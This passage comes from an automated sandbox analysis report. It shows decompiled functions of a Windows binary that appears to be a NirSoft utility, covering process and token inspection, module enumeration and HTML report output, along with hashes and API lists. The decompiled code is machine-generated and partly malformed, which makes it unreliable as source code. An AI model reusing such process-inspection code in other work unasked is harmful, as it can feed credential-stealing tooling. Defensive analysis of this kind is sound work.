                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                0x00409ab0
                                                                                                                0x00409ab7
                                                                                                                0x00409ac8
                                                                                                                0x00409acf
                                                                                                                0x00409ad4
                                                                                                                0x00409ae0
                                                                                                                0x00409ae6
                                                                                                                0x00409ae8
                                                                                                                0x00409af0
                                                                                                                0x00409c3a
                                                                                                                0x00409c41
                                                                                                                0x00409c67
                                                                                                                0x00000000
                                                                                                                0x00409c67
                                                                                                                0x00409c49
                                                                                                                0x00409c50
                                                                                                                0x00409c51
                                                                                                                0x00409c56
                                                                                                                0x00409c57
                                                                                                                0x00409c5a
                                                                                                                0x00000000
                                                                                                                0x00409c64
                                                                                                                0x00409b00
                                                                                                                0x00409b03
                                                                                                                0x00409b06
                                                                                                                0x00409b0b
                                                                                                                0x00409b10
                                                                                                                0x00409ba9
                                                                                                                0x00409bac
                                                                                                                0x00409bc1
                                                                                                                0x00409bc7
                                                                                                                0x00409bcc
                                                                                                                0x00409bd8
                                                                                                                0x00409bf0
                                                                                                                0x00409bf2
                                                                                                                0x00409c23
                                                                                                                0x00409c26
                                                                                                                0x00409c2f
                                                                                                                0x00409c34
                                                                                                                0x00409c34
                                                                                                                0x00000000
                                                                                                                0x00409c2f
                                                                                                                0x00409bf7
                                                                                                                0x00409bfb
                                                                                                                0x00409c02
                                                                                                                0x00409c06
                                                                                                                0x00409c0d
                                                                                                                0x00409c14
                                                                                                                0x00409c17
                                                                                                                0x00409c18
                                                                                                                0x00409c1b
                                                                                                                0x00409c1e
                                                                                                                0x00000000
                                                                                                                0x00409c1e
                                                                                                                0x00409b1f
                                                                                                                0x00409b25
                                                                                                                0x00409b2a
                                                                                                                0x00409b2d
                                                                                                                0x00409b33
                                                                                                                0x00409b3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b4b
                                                                                                                0x00409b53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b6a
                                                                                                                0x00409b6c
                                                                                                                0x00409b6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b77
                                                                                                                0x00409b7b
                                                                                                                0x00409b82
                                                                                                                0x00409b86
                                                                                                                0x00409b8d
                                                                                                                0x00409b8e
                                                                                                                0x00409b94
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                0x00409179
                                                                                                                0x00409209
                                                                                                                0x00409209
                                                                                                                0x00409185
                                                                                                                0x0040918a
                                                                                                                0x0040918f
                                                                                                                0x00409208
                                                                                                                0x00000000
                                                                                                                0x00409191
                                                                                                                0x0040919e
                                                                                                                0x004091a2
                                                                                                                0x004091a7
                                                                                                                0x004091af
                                                                                                                0x004091b3
                                                                                                                0x004091b8
                                                                                                                0x004091c0
                                                                                                                0x004091c4
                                                                                                                0x004091c9
                                                                                                                0x004091d1
                                                                                                                0x004091d5
                                                                                                                0x004091da
                                                                                                                0x004091e2
                                                                                                                0x004091e6
                                                                                                                0x004091eb
                                                                                                                0x004091ed
                                                                                                                0x004091ed
                                                                                                                0x004091eb
                                                                                                                0x004091da
                                                                                                                0x004091c9
                                                                                                                0x004091b8
                                                                                                                0x004091ff
                                                                                                                0x00409202
                                                                                                                0x00409202
                                                                                                                0x00000000
                                                                                                                0x004091ff

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 1182944575-70141382
                                                                                                                • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                                                                • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                                                                • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004090EE, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004090EE() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x4101b8 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x40f83c = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x40f834 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x40f830 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x40f5c4 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x40f828 = _t2;
								if(_t2 != 0) {
									 *0x4101b8 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}






                                                                                                                0x004090f5
                                                                                                                0x00409171
                                                                                                                0x00409171
                                                                                                                0x004090fd
                                                                                                                0x00409103
                                                                                                                0x00409107
                                                                                                                0x00409170
                                                                                                                0x00000000
                                                                                                                0x00409170
                                                                                                                0x00409116
                                                                                                                0x0040911a
                                                                                                                0x0040911f
                                                                                                                0x00409127
                                                                                                                0x0040912b
                                                                                                                0x00409130
                                                                                                                0x00409138
                                                                                                                0x0040913c
                                                                                                                0x00409141
                                                                                                                0x00409149
                                                                                                                0x0040914d
                                                                                                                0x00409152
                                                                                                                0x0040915a
                                                                                                                0x0040915e
                                                                                                                0x00409163
                                                                                                                0x00409165
                                                                                                                0x00409165
                                                                                                                0x00409163
                                                                                                                0x00409152
                                                                                                                0x00409141
                                                                                                                0x00409130
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00408C9F), ref: 004090FD
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00409116
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
                                                                                                                • Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
                                                                                                                • Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 56%
                                                                                                                			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                0x00409faf
                                                                                                                0x00409fb4
                                                                                                                0x00409fb5
                                                                                                                0x00409fb6
                                                                                                                0x0040a043
                                                                                                                0x0040a04a
                                                                                                                0x0040a058
                                                                                                                0x0040a05f
                                                                                                                0x0040a06d
                                                                                                                0x0040a074
                                                                                                                0x0040a08e
                                                                                                                0x0040a099
                                                                                                                0x0040a0ab
                                                                                                                0x0040a0c9
                                                                                                                0x0040a0ce
                                                                                                                0x00000000
                                                                                                                0x0040a0ce
                                                                                                                0x00409fc3
                                                                                                                0x00409fca
                                                                                                                0x00409fd8
                                                                                                                0x00409fdf
                                                                                                                0x00409ff9
                                                                                                                0x0040a006
                                                                                                                0x0040a018
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: %%0.%df
                                                                                                                • API String ID: 3473751417-763548558
                                                                                                                • Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
                                                                                                                • Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
                                                                                                                • Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                0x00406216
                                                                                                                0x0040621b
                                                                                                                0x00406222
                                                                                                                0x0040625f
                                                                                                                0x00406263
                                                                                                                0x00406269
                                                                                                                0x00406271
                                                                                                                0x00406273
                                                                                                                0x00406289
                                                                                                                0x00406289
                                                                                                                0x0040628e
                                                                                                                0x0040628f
                                                                                                                0x004062a9
                                                                                                                0x004062ab
                                                                                                                0x004062ad
                                                                                                                0x004062b0
                                                                                                                0x004062c3
                                                                                                                0x004062c3
                                                                                                                0x004062d3
                                                                                                                0x004062da
                                                                                                                0x004062f1
                                                                                                                0x004062f7
                                                                                                                0x004062fe
                                                                                                                0x0040630d
                                                                                                                0x00406312
                                                                                                                0x0040631e
                                                                                                                0x00406327
                                                                                                                0x00406275
                                                                                                                0x00406283
                                                                                                                0x00406283
                                                                                                                0x00406285
                                                                                                                0x00406287
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406277
                                                                                                                0x0040627a
                                                                                                                0x00406280
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x00406280
                                                                                                                0x00000000
                                                                                                                0x0040627a
                                                                                                                0x00000000
                                                                                                                0x00406283
                                                                                                                0x00406273
                                                                                                                0x00406224
                                                                                                                0x00406224
                                                                                                                0x00406229
                                                                                                                0x0040622a
                                                                                                                0x0040622f
                                                                                                                0x00406236
                                                                                                                0x0040623c
                                                                                                                0x00406243
                                                                                                                0x00406245
                                                                                                                0x00406247
                                                                                                                0x00406248
                                                                                                                0x0040624b
                                                                                                                0x00406254
                                                                                                                0x00406254
                                                                                                                0x0040632d
                                                                                                                0x00406334

                                                                                                                APIs
                                                                                                                • LoadMenuW.USER32 ref: 00406236
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
                                                                                                                  • Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
                                                                                                                  • Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
                                                                                                                  • Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7
                                                                                                                • DestroyMenu.USER32(00000000), ref: 00406254
                                                                                                                • CreateDialogParamW.USER32 ref: 004062A9
                                                                                                                • GetDesktopWindow.USER32 ref: 004062B4
                                                                                                                • CreateDialogParamW.USER32 ref: 004062C1
                                                                                                                • memset.MSVCRT ref: 004062DA
                                                                                                                • GetWindowTextW.USER32 ref: 004062F1
                                                                                                                • EnumChildWindows.USER32 ref: 0040631E
                                                                                                                • DestroyWindow.USER32(00000005), ref: 00406327
                                                                                                                  • Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                • String ID: caption
                                                                                                                • API String ID: 973020956-4135340389
                                                                                                                • Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
                                                                                                                • Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
                                                                                                                • Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 65%
                                                                                                                			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                0x004081e4
                                                                                                                0x004081ec
                                                                                                                0x004081fc
                                                                                                                0x00408200
                                                                                                                0x00408215
                                                                                                                0x0040821c
                                                                                                                0x0040822a
                                                                                                                0x00408231
                                                                                                                0x0040823f
                                                                                                                0x00408246
                                                                                                                0x0040824b
                                                                                                                0x0040824e
                                                                                                                0x0040825a
                                                                                                                0x0040825c
                                                                                                                0x00408261
                                                                                                                0x0040826c
                                                                                                                0x0040826d
                                                                                                                0x0040826e
                                                                                                                0x00408273
                                                                                                                0x00408273
                                                                                                                0x00408276
                                                                                                                0x0040827c
                                                                                                                0x0040828a
                                                                                                                0x00408290
                                                                                                                0x004082ab
                                                                                                                0x004082c5
                                                                                                                0x004082c6
                                                                                                                0x004082d1
                                                                                                                0x004082d2
                                                                                                                0x004082d3
                                                                                                                0x004082e7
                                                                                                                0x004082ec
                                                                                                                0x004082f0
                                                                                                                0x00000000
                                                                                                                0x004082f5
                                                                                                                0x004082fe

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261
                                                                                                                • <table dir="rtl"><tr><td>, xrefs: 00408284
                                                                                                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
                                                                                                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$wcscpy
                                                                                                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                • API String ID: 1283228442-2366825230
                                                                                                                • Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
                                                                                                                • Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
